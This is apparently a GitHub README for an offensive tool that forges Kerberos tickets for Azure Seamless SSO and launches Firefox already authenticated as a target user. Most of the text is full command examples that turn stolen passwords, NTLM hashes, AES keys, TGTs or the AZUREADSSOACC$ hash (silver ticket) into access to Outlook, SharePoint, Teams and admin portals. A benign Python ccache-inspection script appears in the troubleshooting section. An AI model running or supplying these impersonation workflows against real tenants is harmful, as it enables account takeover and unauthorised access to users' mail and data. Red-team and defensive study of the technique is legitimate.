GitHub: dejisec/seamless-sso-browser
# seamless-sso-browser
Forges Kerberos tickets for Azure Seamless SSO and drops you into a target user's browser session. Give it a hash, a password, a TGT -- whatever you've got. It gets the tickets sorted and launches Firefox already authenticated.
## Prerequisites
- Linux with GSSAPI libs (Kali works out of the box)
- Firefox (`sudo apt install firefox-esr`)
- Seamless SSO enabled on the target tenant
## Usage
Run directly:

```shell
uvx git+https://github.com/dejisec/seamless-sso-browser -h
```
Or clone and run:

```shell
git clone https://github.com/dejisec/seamless-sso-browser.git
cd seamless-sso-browser
uv sync
uv run seamless-sso-browser -h
```
## Examples
### You have the user's password or hash
Talks to the DC to get a TGT, then requests service tickets for both SSO SPNs.
```shell
seamless-sso-browser \
  --domain domain.local \
  --dc-ip 10.0.0.1 \
  --user jsmith \
  --password 'P@ssw0rd'
```

Also works with `--user-password-hash` or `--user-aes-key`.
### You have a TGT
Maybe from Rubeus, maybe from a ccache on disk. Pass it in and the tool requests the SSO service tickets from the DC.
```shell
seamless-sso-browser \
  --domain domain.local \
  --dc-ip 10.0.0.1 \
  --tgt /path/to/tgt.ccache
```
Accepts ccache, kirbi, or base64.
### You have a TGS
Already got the service ticket? No DC needed.
```shell
seamless-sso-browser \
  --domain domain.local \
  --tgs /path/to/tgs.kirbi
```
Accepts ccache, kirbi, or base64.
### You have a ccache file
Skip everything, just point at it:
```shell
seamless-sso-browser \
  --domain domain.local \
  --ccache /path/to/combined.ccache
```
### Targeting something other than Outlook
Default opens Outlook. Use `--target` to pick a different app:
```shell
seamless-sso-browser \
  --domain domain.local \
  --ccache /path/to/combined.ccache \
  --target sharepoint --tenant contoso
```
Presets: `outlook` (default), `sharepoint` (needs `--tenant`), `teams`, `onedrive`, `admin`, `entra`, `azure`.
You can also pass a raw URL: `--target https://custom-app.contoso.com`.
### User-agent
By default the tool presents an Edge on Windows 11 user-agent; override it with `--useragent "..."` if needed.
## All flags
### Authentication (pick one)
| Flag | Description |
|------|------------|
| `--adssoacc-ntlm` | AZUREADSSOACC$ NTLM hash (silver ticket, no DC) |
| `--adssoacc-aes` | AZUREADSSOACC$ AES key (silver ticket, no DC) |
| `--password` | User's password (needs DC) |
| `--user-password-hash` | User's NTLM hash, `[LMHASH:]NTHASH` (needs DC) |
| `--user-aes-key` | User's AES key (needs DC) |
| `--tgt` | Pre-obtained TGT, file or base64 (needs DC) |
| `--tgs` | Pre-obtained TGS, file or base64 (no DC) |
| `--ccache` | Pre-forged ccache file (skips everything) |
### Identity and domain
| Flag | Description |
|------|------------|
| `--domain` | AD domain (always required) |
| `--user` | Target sAMAccountName |
| `--user-sid` | Full user SID (required for silver ticket forgery) |
| `--upn` | UPN for display only |
| `--dc-ip` | Domain controller address |
### Target and browser
| Flag | Description |
|------|------------|
| `--target` | App preset or URL (default: `outlook`) |
| `--tenant` | M365 tenant name (for `--target sharepoint`) |
| `--useragent` | Custom user-agent (default: Edge on Windows 11) |
| `--firefox-path` | Path to Firefox binary |
| `--no-cleanup` | Keep temp files after exit |
| `--verbose` | Print ccache path, krb5.conf, and the Firefox command |
## Troubleshooting
Run with `--verbose --no-cleanup` first. That prints the ccache path, krb5.conf contents, and the exact Firefox command so you can poke at things manually.
If SPNEGO negotiation isn't happening, set these and relaunch Firefox from the same shell:
```shell
export NSPR_LOG_MODULES=negotiateauth:5
export NSPR_LOG_FILE=/tmp/firefox_spnego.log
export KRB5_TRACE=/dev/stderr
```
Usual suspects: clock skew over 5 minutes, Firefox not picking up the ccache (check `KRB5CCNAME`), or Conditional Access blocking the session even though the tickets are valid.
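The two checks above (is `KRB5CCNAME` pointing at the file you think, and are the tickets in it still valid for the clock you have) can be done without any Kerberos libraries by reading the ccache directly. The following is an added troubleshooting aid, not code from the seamless-sso-browser project: it resolves `KRB5CCNAME`, parses an MIT format-4 ccache (the only version handled), lists each credential's service principal and expiry, and flags tickets whose start time is more than five minutes in the future, which is what clock skew against the DC looks like from the client side. The sample cache it builds for itself is constructed in the block with a zeroed key and placeholder ticket bytes; the realm, user and SPN in it are placeholders, not values from the project.

```python
"""Inspect an MIT Kerberos credential cache (format 4) and the KRB5CCNAME that
Firefox reads.  Added troubleshooting example; not part of seamless-sso-browser."""
import struct
import time


def krb5ccname_path(env):
    """Return the file path KRB5CCNAME points at, or None if unset or not a FILE: cache."""
    value = env.get("KRB5CCNAME")
    if not value:
        return None
    if ":" in value:
        scheme, _, rest = value.partition(":")
        return rest if scheme.upper() == "FILE" else None
    return value


def _read_data(buf, pos):
    """Read a ccache 'data' item: uint32 big-endian length, then that many bytes."""
    (n,) = struct.unpack_from(">I", buf, pos)
    pos += 4
    return bytes(buf[pos:pos + n]), pos + n


def _read_principal(buf, pos):
    """Read a principal: uint32 name type, uint32 component count, realm, components."""
    _name_type, ncomp = struct.unpack_from(">II", buf, pos)
    pos += 8
    realm, pos = _read_data(buf, pos)
    comps = []
    for _ in range(ncomp):
        comp, pos = _read_data(buf, pos)
        comps.append(comp.decode())
    return "/".join(comps) + "@" + realm.decode(), pos


def parse_ccache(buf):
    """Return (default principal, list of credential dicts) from a format-4 ccache."""
    if buf[:2] != b"\x05\x04":
        raise ValueError("only ccache format version 4 is handled here")
    (hdr_len,) = struct.unpack_from(">H", buf, 2)
    pos = 4 + hdr_len                                  # skip header tags (KDC time offset)
    default_princ, pos = _read_principal(buf, pos)
    creds = []
    while pos < len(buf):
        client, pos = _read_principal(buf, pos)
        server, pos = _read_principal(buf, pos)
        (etype,) = struct.unpack_from(">H", buf, pos)  # keyblock: uint16 enctype + data
        _key, pos = _read_data(buf, pos + 2)
        _authtime, starttime, endtime, renew_till = struct.unpack_from(">IIII", buf, pos)
        pos += 16 + 1                                  # four times, then uint8 is_skey
        (flags,) = struct.unpack_from(">I", buf, pos)
        pos += 4
        for _ in range(2):                             # address list, then authdata list
            (count,) = struct.unpack_from(">I", buf, pos)
            pos += 4
            for _ in range(count):
                _item, pos = _read_data(buf, pos + 2)  # uint16 type, then data
        ticket, pos = _read_data(buf, pos)
        _second_ticket, pos = _read_data(buf, pos)
        creds.append({"client": client, "server": server, "etype": etype,
                      "starttime": starttime, "endtime": endtime,
                      "renew_till": renew_till, "flags": flags, "ticket_len": len(ticket)})
    return default_princ, creds


def check_ccache(buf, now=None):
    """Summarise the service principals in the cache and which are expired or not yet valid."""
    now = time.time() if now is None else now
    default_princ, creds = parse_ccache(buf)
    return {"default_principal": default_princ,
            "servers": [c["server"] for c in creds],
            "expired": [c["server"] for c in creds if c["endtime"] <= now],
            # start time more than 5 minutes ahead of our clock: likely skew against the DC
            "not_yet_valid": [c["server"] for c in creds if c["starttime"] > now + 300]}


def _data(b):
    return struct.pack(">I", len(b)) + b


def _principal(name_type, realm, comps):
    out = struct.pack(">II", name_type, len(comps)) + _data(realm.encode())
    return out + b"".join(_data(c.encode()) for c in comps)


def build_sample_ccache(endtime):
    """Constructed sample cache: one credential, zero key, placeholder ticket bytes."""
    header = struct.pack(">HHii", 1, 8, 0, 0)          # tag 1: KDC time offset of 0s/0us
    client = _principal(1, "DOMAIN.LOCAL", ["jsmith"])           # placeholder realm/user
    server = _principal(2, "DOMAIN.LOCAL", ["HTTP", "sso.example.test"])  # placeholder SPN
    cred = client + server
    cred += struct.pack(">H", 18) + _data(b"\x00" * 32)  # aes256-cts enctype, zeroed key
    cred += struct.pack(">IIII", endtime - 36000, endtime - 36000, endtime, endtime + 86400)
    cred += b"\x00"                                    # is_skey
    cred += struct.pack(">I", 0x40A00000)              # flags: forwardable, renewable, pre-authent
    cred += struct.pack(">II", 0, 0)                   # no addresses, no authdata
    cred += _data(b"\x30\x03\x02\x01\x05")             # placeholder ticket blob, not a real ticket
    cred += _data(b"")                                 # no second ticket
    return b"\x05\x04" + struct.pack(">H", len(header)) + header + client + cred


if __name__ == "__main__":
    import os
    path = krb5ccname_path(os.environ)
    data = open(path, "rb").read() if path else build_sample_ccache(int(time.time()) + 3600)
    print(check_ccache(data))
```

Run it from the same shell you launch Firefox from: if `KRB5CCNAME` resolves to a file it is inspected, otherwise the constructed sample is used so the script still demonstrates the output shape. A service principal listed under `expired` or `not_yet_valid` points at lifetime or clock problems rather than at SPNEGO negotiation.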
## Acknowledgments
Inspired by [SeamlessPass](https://github.com/Malcrove/SeamlessPass) by Malcrove, which does the Seamless SSO flow as a CLI tool and gives you OAuth tokens. This project takes the same idea but wires it into a browser session instead, so you land directly in Outlook, SharePoint, or whatever else the target has access to.